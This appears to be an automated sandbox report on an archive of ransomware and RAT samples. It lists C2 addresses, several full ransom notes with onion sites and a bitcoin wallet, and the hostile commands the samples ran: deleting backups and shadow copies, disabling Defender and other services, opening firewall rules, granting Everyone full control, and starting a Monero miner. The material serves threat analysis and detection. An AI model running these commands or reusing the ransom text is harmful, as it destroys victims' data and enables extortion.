Resubmissions

28-10-2024 00:19

241028-al8bfswbrc 3

27-10-2024 06:22

241027-g46znsslhr 1

26-10-2024 10:54

241026-mzm9natclb 3

25-10-2024 21:14

241025-z3q6yavdmb 10

Analysis

  • max time kernel
    77s
  • max time network
    302s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-10-2024 21:14

General

  • Target

    RNSM00436.7z

  • Size

    70.2MB

  • MD5

    5203ef0108208cd0f82278c15b5ef62d

  • SHA1

    caf7e1b519073e78d82ab479cef4eda3dfb2081e

  • SHA256

    54efded0c82f76a168ee6aa0fbf96f54693eb1d1c1b12c6a733ceb24d40c497e

  • SHA512

    83f416c07c49f587d7a57dbefe3a65a7169e022085c6938c93a8ab0c53b00cb54c22a404156aa8d93b7173a79039f6d59a9cf6adc16cec65d4d1a92827d805fa

  • SSDEEP

    1572864:LYLhPSFGAnRCNq06snfEMDuuqTXzUiaYlOiqn3TdvGcICnYP:sLlSFbnUfxKuqbQiaYlT+3pvf5y

Malware Config

Extracted

Family

crimsonrat

C2

151.106.14.125

212.200.120.154

Extracted

Family

njrat

Version

0.7d

Botnet

H-Face

C2

aqq.linkpc.net:999

Mutex

b707d48a130b129126b45cd0625853bc

Attributes
  • reg_key

    b707d48a130b129126b45cd0625853bc

  • splitter

    |'|'|

Extracted

Family

danabot

Version

1827

Botnet

3

C2

184.95.51.183:443

184.95.51.175:443

192.210.198.12:443

184.95.51.180:443

Attributes
  • embedded_hash

    AEF96B4D339B580ABB737F203C2D0F52

  • type

    main

rsa_pubkey.plain
rsa_pubkey.plain

Extracted

Family

urelas

C2

1.234.83.146

133.242.129.155

218.54.31.226

218.54.30.235

218.54.31.165

Extracted

Path

C:\ProgramData\regid.1991-06.com.microsoft\305E39-Readme.txt

Ransom Note
Hi! Your files are encrypted. All files for this computer has extension: .305e39 Your filenames can be changed too, except extensions for free decrypt. -- If for some reason you read this text before the encryption ended, this can be understood by the fact that the computer slows down, and your heart rate has increased due to the ability to turn it off, then we recommend that you move away from the computer and accept that you have been compromised. Rebooting/shutdown will cause you to lose files without the possibility of recovery. -- Our encryption algorithms are very strong and your files are very well protected, the only way to get your files back is to cooperate with us and get the decrypter program. Do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover. -- For us this is just business and to prove to you our seriousness, we will decrypt you few files for free. Just open our website, upload the encrypted files and get the decrypted files for free. Additionally, you must know that your sensitive data has been stolen by our analyst experts and if you choose to no cooperate with us, you are exposing yourself to huge penalties with lawsuits and government if we both don't find an agreement. We have seen it before; cases with multi million costs in fines and lawsuits, not to mention the company reputation and losing clients trust and the medias calling non-stop for answers. Come chat with us and you could be surprised on how fast we both can find an agreement without getting this incident public. -- *** IF YOU ARE AN EMPLOYER OF A COMPANY THEN YOU SHOULD KNOW THAT SPREADING SENSITIVE INFORMATION ABOUT YOUR COMPANY BEING COMPROMISED IS A VIOLATION OF CONFIDENTIALITY. YOUR COMPANY'S REPUTATION WILL SUFFER AND SANCTIONS WILL BE TAKEN AGAINST YOU. -- WE HIGHLY SUGGEST THAT YOU DON'T CONTACT THE AUTHORITIES REGARDING THIS INCIDENT BECAUSE IF YOU DO, THEN AUTHORITIES WILL MAKE THIS PUBLIC WHICH COMES WITH A COST FOR YOUR ENTERPRISE. THE RECOVERY PROCESS OF YOUR FILES WILL BE FASTER IF YOU COME AND CHAT WITH US EARLY. IF YOU CHOOSE TO COOPERATE, YOU WILL SEE THAT WE ARE PROFESSIONALS WHO GIVES GOOD SUPPORT. *** -- Steps to get access on our website: 1.Download and install tor-browser: https://torproject.org/ 2.Open our website: pb36hu4spl6cyjdfhing7h3pw6dhpk32ifemawkujj4gp33ejzdq3did.onion If the website is not available, open another one: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion 3.Put your personal code in the input form: {code_305e39: YpFSk5HyQh2OJSEQ/e+lA9ccKgWtgDDEE7dNfb3HYfcngBV9jb BXt84fuQ7m/mzP9+XUjRqkhkRVlz+Q0aBpDQH4WPAfYmZet/DL dL05XjBIFPm/vy9fZYriKfjR/uACmriHqyfRZJdhUTuDEZMZjV QXPs1vZluQb3kimL778/cjH42uCgIs25xCvBLipV6DIGa/c1Of CjrkhYTe/TpuuMLiNofZ9oBBZvlwD7yOTj+2PsDco8TXOtnunr C+crRpHvcL12xLA8QwbeioY2uUa9NqUbDpSlz+YQ==}
URLs

http://pb36hu4spl6cyjdfhing7h3pw6dhpk32ifemawkujj4gp33ejzdq3did.onion

http://rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

revros.ddns.net:6606

revros.ddns.net:7707

revros.ddns.net:8808

Mutex

Microsoft_Azure

Attributes
  • delay

    3

  • install

    true

  • install_file

    Update.exe

  • install_folder

    %Temp%

aes.plain

Extracted

Path

C:\Users\Admin\Desktop\00436\@[email protected]

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Extracted

Path

C:\Recovery\s4keqdh4fb-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension s4keqdh4fb. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/6E35E64715104E13 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decoder.re/6E35E64715104E13 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: EaFk/8wugZaWXio8loVuT9upAtpXHPhXQVmnCynH/hv7SYIGY3D4OHDJ3D7fMLFe fhZv7H87c85MEJz2wc/kAuMXcZShbvHpd0Vp/VEMTk8OBDxccftEVQ0qeogmMmP0 kT4rem5cadQn2vNTS15QOGdkmErzXIsmXhLjDhlZqFiU4IEEXhLZfzhFCV68LHsl u7mnkWndhgYRZZSH1KjmAnjQBydc8b7fZbGi+SSWLMjGF2MhADS93fK7LSfCT6Vm h15d+xw7strCSxwAsHps01NuIkpQL0MNy6PC2HO2TBsLriiIvVeVNkgFxa+BQkR9 jgpsFthIuEIKiaJhAo9o1qZNJvhVxSH0utxqiQmuktp+Ub6tmJxkCZW2aYFjVgWp 5ZhCvneLIlNrTCcD5XI8u2yDKZQbxVVT6yDS11bZRJuVovlZ+wsL8bT+kPoi0Uqz eYqNn453gRa0bBrGO2ixJZ2MtxoMn1Dy9dU4V5KOTzSJud8Bch0rhppkvvJyMXup Cw34FND+haS/4hx8ui3kYkhjVsM8VaIn5ks5/tbYu1Z7UpJ1QMltkXRKUNF2W/nH 69WgwTMnMjhIdgCod50HdreivCKMai8Wswhpdpj1Bs6iJUYEuDEf3Ga+dkgGKkrM OGiAl8IQaSwE8/QvnI1CeEM1OYdeichcgx7boh9gYnyW8D7EEqxMwxhqbvp47yJs HFNt2xVPUT8/I4cBr5f1+TZgFr+DpwCyrEoVQrxhBHcTyjd97x86FjJ+t1RSafnk jqMtqL04ecFxTr+s+NV8Jxp5QvB4PEh9Un9S5OHW5N7PvykbbJJnklbnOttLhLYQ aSFehUHmdnsWHoP+5yIbCWE15Dh6Jr240khc579iBEczJjHKX4lfDz1uabzl1P6e po8LiB+5TxGs0Wq+aTB9Px0q2TKFtkcOp3j3sSirMBtMS/I+F7ztfvJNwfL9vDov yxwX11VJzxUDRM17jD1BnY/emaN3uDmx/vd9caWd5EfEsLQkeywrFpIZEbBvlfpq 8HvKTOvfTzwQWyt7khPDTfSdrcknaVhhILpOA6MfwH2nLgU9NkyiuyZrffixv2wj RLWq78t7ytoF8aK5kxglgU3YPQyPwjzGz16+eG2qCgBlo4XLfehBdRZlm+jH2kdn dvr0z1FZwOLsVGmJZH5QdoVzc6v0wBJULlr6jJqk9qyh6dfs9zCSBlAYt/Ie8SdC YPcBox4yGyiK+wxgd7QPjd6h5OyBYloWGiw0xSqk5UWXPNxgeOF7y3VW6MsN4Wx/ 4+XWdOy5Bj4Q3mNlZPYtVhKsy8GW65q0ZeCyfMcopiqElt5Q38HSMb10m7Qy13yq AI35KnrqMlGGC3vhMnUrX71xUvoou7a85cc+oBb4b36g4r8h ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/6E35E64715104E13

http://decoder.re/6E35E64715104E13

Extracted

Path

C:\Users\Admin\README.1d46f1f8.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT When you open our website, put the following data in the input form: Key: 0kZdK3HQhsAkUtvRl41QkOdpJvzcWnCrBjjgg5U4zfuWeTnZR5Ssjd3QLHpmbjxjo7uWzKbt8qPVuYN38TsDPI3bemd5I40ksemIzuI5OhIHZsi9cn3Wpd7OUT72FP9MyAUzR586yMsI2Ygri9in0Bf4EkG0pmBOLyRG1T788foGJQW1WxS1Qd2sMVvX0jKlbGG1zLp7g0u6buDCzSMyTjWjuVzJYufBBv7S2XvciEVvboiTNbZA4UUU6PttKERQSb018aILd6xO3ulk6fbEgZDO5tZSGn2zRevn5YXnHtg6vt1ToLe3izQOgYbs8Ja1fkfJBUYVux1ITyWBjpn0xPayKfwln8SqgMkbqiDyxEDEtFhqiffLcONMhi4TmW50loZIC6mWSaOjThWp6XSJUWPtY8Mkzs8Cs0qjPahx58iAEVIRGUVpLkMs7xPN7ydZ6wMWaOcRC1AD1JEUVTjLikXXyckgYaS6FnEv0UNEsv6QbTLSpDomIg3rEYZBib6ozrwH5n0M5wrKo8NciUBmfJWDP4XKkjznpsa05rEpuAklM0dMmZsYGVR !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT

Extracted

Family

latentbot

C2

foxmyfox132.zapto.org

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • CrimsonRAT main payload 1 IoCs
  • CrimsonRat

    Crimson RAT is a malware linked to a Pakistani-linked threat actor.

  • Crimsonrat family
  • Danabot

    Danabot is a modular banking Trojan that has been linked with other malware.

  • Danabot family
  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Darkside family
  • Detect MafiaWare666 ransomware 2 IoCs
  • Disables service(s) 3 TTPs
  • GandCrab payload 2 IoCs
  • Gandcrab

    Gandcrab is a Trojan horse that encrypts files on a computer.

  • Gandcrab family
  • LatentBot

    Modular trojan written in Delphi which has been in-the-wild since 2013.

  • Latentbot family
  • MafiaWare666 Ransomware

    MafiaWare666 is ransomware written in C# with multiple variants.

  • Mafiaware666 family
  • Modifies firewall policy service 3 TTPs 4 IoCs
  • Njrat family
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Sodinokibi family
  • Urelas

    Urelas is a trojan targeting card games.

  • Urelas family
  • VanillaRat

    VanillaRat is an advanced remote administration tool coded in C#.

  • Vanillarat family
  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • Wannacry family
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (153) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Vanilla Rat payload 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Modifies Windows Firewall 2 TTPs 4 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 5 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • VMProtect packed file 2 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 25 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 54 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 30 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Discovers systems in the same network 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies Control Panel 4 IoCs
  • Modifies registry class 7 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00436.7z"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1008
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2308
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /1
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:924
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4380
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4304
      • C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.MSIL.Blocker.gen-649d5c728c759d6185e1420b9eeaeb370ae7c080782b7a0565cedb7b53c2c50d.exe
        HEUR-Trojan-Ransom.MSIL.Blocker.gen-649d5c728c759d6185e1420b9eeaeb370ae7c080782b7a0565cedb7b53c2c50d.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:956
      • C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a1d6d6618d366d7f5e4f2eef7ed3d5f195b6ea591ea3067270a34f67d2ca2de6.exe
        HEUR-Trojan-Ransom.MSIL.Blocker.gen-a1d6d6618d366d7f5e4f2eef7ed3d5f195b6ea591ea3067270a34f67d2ca2de6.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4872
        • C:\Users\Admin\AppData\Roaming\Defender.exe
          "C:\Users\Admin\AppData\Roaming\Defender.exe"
          4⤵
            PID:4736
            • C:\WINDOWS\explorer.exe
              C:\WINDOWS\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.2miners.com:2222 --user=46UvnmBZBzLCi3SynE1oYNJNfDAyYoYJFcwpJHH1XB6yAKd6bi7PuizHttyP6eiWbxVt11gWsk7mDPEtVBPBN4f36gZc8Wh --pass= --cpu-max-threads-hint=20 --donate-level=5 --unam-idle-wait=15 --unam-idle-cpu=40
              5⤵
                PID:14092
          • C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.MSIL.Blocker.gen-cebc7e39289aece621aee501077f89afb9d47e26453e940e0c111246e2bf84e8.exe
            HEUR-Trojan-Ransom.MSIL.Blocker.gen-cebc7e39289aece621aee501077f89afb9d47e26453e940e0c111246e2bf84e8.exe
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:5056
            • C:\Users\Admin\AppData\Roaming\System64.exe
              "C:\Users\Admin\AppData\Roaming\System64.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4412
              • C:\Windows\SysWOW64\netsh.exe
                netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\System64.exe" "System64.exe" ENABLE
                5⤵
                • Modifies Windows Firewall
                • Event Triggered Execution: Netsh Helper DLL
                • System Location Discovery: System Language Discovery
                PID:1692
          • C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.MSIL.Encoder.gen-fb81347ec3a8abc5259abd425aa435ab166eb69a5c76baef19ae23f6455c1484.exe
            HEUR-Trojan-Ransom.MSIL.Encoder.gen-fb81347ec3a8abc5259abd425aa435ab166eb69a5c76baef19ae23f6455c1484.exe
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2876
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rokqusi5\rokqusi5.cmdline"
              4⤵
                PID:5188
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB5BA.tmp" "c:\Users\Admin\AppData\Local\Temp\rokqusi5\CSC91A41F053C7A4BD29B94A299A0D0914A.TMP"
                  5⤵
                    PID:12916
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk
                  4⤵
                    PID:13080
                  • C:\Windows\SysWOW64\sc.exe
                    "C:\Windows\System32\sc.exe" config SQLTELEMETRY start= disabled
                    4⤵
                    • Launches sc.exe
                    PID:12856
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
                    4⤵
                      PID:9248
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
                      4⤵
                        PID:10132
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk
                        4⤵
                          PID:16872
                        • C:\Windows\SysWOW64\sc.exe
                          "C:\Windows\System32\sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                          4⤵
                          • Launches sc.exe
                          PID:16512
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk
                          4⤵
                            PID:16580
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk
                            4⤵
                              PID:12496
                            • C:\Windows\SysWOW64\sc.exe
                              "C:\Windows\System32\sc.exe" config SQLWriter start= disabled
                              4⤵
                              • Launches sc.exe
                              PID:2608
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-CimInstance Win32_ShadowCopy | Remove-CimInstance
                              4⤵
                                PID:9244
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  5⤵
                                    PID:5372
                                • C:\Windows\SysWOW64\sc.exe
                                  "C:\Windows\System32\sc.exe" config SstpSvc start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  PID:8972
                                • C:\Windows\SysWOW64\sc.exe
                                  "C:\Windows\System32\sc.exe" config MBAMService start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  PID:14232
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
                                  4⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  PID:10664
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
                                  4⤵
                                    PID:4720
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c rd /s /q D:\\$Recycle.bin
                                    4⤵
                                      PID:9992
                                    • C:\Windows\SysWOW64\sc.exe
                                      "C:\Windows\System32\sc.exe" config fdPHost start= auto
                                      4⤵
                                      • Launches sc.exe
                                      PID:8760
                                    • C:\Windows\SysWOW64\sc.exe
                                      "C:\Windows\System32\sc.exe" config FDResPub start= auto
                                      4⤵
                                      • Launches sc.exe
                                      PID:10972
                                    • C:\Windows\SysWOW64\sc.exe
                                      "C:\Windows\System32\sc.exe" config SSDPSRV start= auto
                                      4⤵
                                      • Launches sc.exe
                                      PID:14536
                                    • C:\Windows\SysWOW64\sc.exe
                                      "C:\Windows\System32\sc.exe" config Dnscache start= auto
                                      4⤵
                                      • Launches sc.exe
                                      PID:5344
                                    • C:\Windows\SysWOW64\sc.exe
                                      "C:\Windows\System32\sc.exe" config upnphost start= auto
                                      4⤵
                                      • Launches sc.exe
                                      PID:15884
                                    • C:\Windows\SysWOW64\netsh.exe
                                      "C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="Network Discovery" new enable=Yes
                                      4⤵
                                      • Modifies Windows Firewall
                                      PID:17364
                                    • C:\Windows\SysWOW64\netsh.exe
                                      "C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
                                      4⤵
                                      • Modifies Windows Firewall
                                      PID:11968
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
                                      4⤵
                                        PID:5836
                                        • C:\Users\Admin\AppData\Local\Temp\B2CF781D-9998-4BAF-AC1A-0330F06674CD\dismhost.exe
                                          C:\Users\Admin\AppData\Local\Temp\B2CF781D-9998-4BAF-AC1A-0330F06674CD\dismhost.exe {0A2295AF-4ABD-4D01-80E9-68F30924A242}
                                          5⤵
                                            PID:14268
                                        • C:\Windows\SysWOW64\mountvol.exe
                                          "mountvol.exe"
                                          4⤵
                                            PID:10080
                                          • C:\Windows\SysWOW64\mountvol.exe
                                            "C:\Windows\System32\mountvol.exe" A: \\?\Volume{62c5c1e3-0000-0000-0000-100000000000}\
                                            4⤵
                                              PID:15136
                                            • C:\Windows\SysWOW64\mountvol.exe
                                              "C:\Windows\System32\mountvol.exe" B: \\?\Volume{62c5c1e3-0000-0000-0000-d01200000000}\
                                              4⤵
                                                PID:11060
                                              • C:\Windows\SysWOW64\mountvol.exe
                                                "C:\Windows\System32\mountvol.exe" E: \\?\Volume{62c5c1e3-0000-0000-0000-f0ff3a000000}\
                                                4⤵
                                                  PID:11188
                                                • C:\Windows\SysWOW64\mountvol.exe
                                                  "C:\Windows\System32\mountvol.exe" G: \\?\Volume{86ca1acd-84cf-11ef-adde-806e6f6e6963}\
                                                  4⤵
                                                    PID:7980
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    "C:\Windows\System32\icacls.exe" "C:*" /grant Everyone:F /T /C /Q
                                                    4⤵
                                                    • Modifies file permissions
                                                    PID:11460
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    "C:\Windows\System32\icacls.exe" "D:*" /grant Everyone:F /T /C /Q
                                                    4⤵
                                                    • Modifies file permissions
                                                    PID:5552
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    "C:\Windows\System32\icacls.exe" "Z:*" /grant Everyone:F /T /C /Q
                                                    4⤵
                                                    • Modifies file permissions
                                                    PID:12752
                                                  • C:\Windows\SysWOW64\arp.exe
                                                    "arp" -a
                                                    4⤵
                                                    • Network Service Discovery
                                                    PID:2824
                                                  • C:\Windows\SysWOW64\net.exe
                                                    "net.exe" view
                                                    4⤵
                                                    • Discovers systems in the same network
                                                    PID:6916
                                                  • C:\Windows\SysWOW64\shell.exe
                                                    "C:\Windows\system32\shell.exe" "C:\Windows\System32\net.exe" use \\10.127.0.102
                                                    4⤵
                                                      PID:15924
